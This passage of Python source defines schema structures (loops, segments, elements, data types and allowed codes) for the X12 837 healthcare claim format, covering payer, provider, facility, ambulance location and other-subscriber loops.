Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DMG", Properties( desc="Subscriber Demographic Information", position="0320", repeat="1", req_sit="S", syntax="P0102 P1011 C1105", ), Element( "DMG01", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D8"], ), ), Element( "DMG02", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=2, codes=[], ), ), Element( "DMG03", Properties( desc="Gender Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["F", "M", "U"], ), ), Element( "DMG04", Properties( desc="Marital Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Composite( "C056", Properties( desc="Composite Race or Ethnicity Information", refdes="", repeat="10", req_sit="N", seq="05", ), ), Element( "DMG06", Properties( desc="Citizenship Status Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Element( "DMG07", Properties( desc="Country Code", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), Element( "DMG08", Properties( desc="Basis of Verification Code", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "DMG09", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=9, codes=[], ), ), Element( "DMG10", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=10, codes=[], ), ), Element( "DMG11", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Subscriber Secondary Identification", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Property and Casualty Claim Number", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["Y4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Property and Casualty Subscriber Contact Information", position="0400", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2010BB = Loop( "2010BB", Properties( desc="Payer Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Payer Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Payer Address", position="0250", repeat="1", req_sit="S", syntax="" ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Payer City, State, ZIP Code", position="0300", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Payer Secondary Identification", position="0350", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Billing Provider Secondary Identification", position="0350", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310A = Loop( "2310A", Properties( desc="Referring Provider Name", looptype="", position="2500", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310B = Loop( "2310B", Properties( desc="Rendering Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="2550", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310C = Loop( "2310C", Properties( desc="Service Facility Location Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Service Facility Contact Information", position="2750", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310D = Loop( "2310D", Properties( desc="Supervising Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310E = Loop( "2310E", Properties( desc="Ambulance Pick-up Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2310F = Loop( "2310F", Properties( desc="Ambulance Drop-off Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2330A = Loop( "2330A", Properties( desc="Other Subscriber Name", looptype="", position="3250", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Other Subscriber Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Subscriber Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Subscriber City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Subscriber Secondary Identification", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", 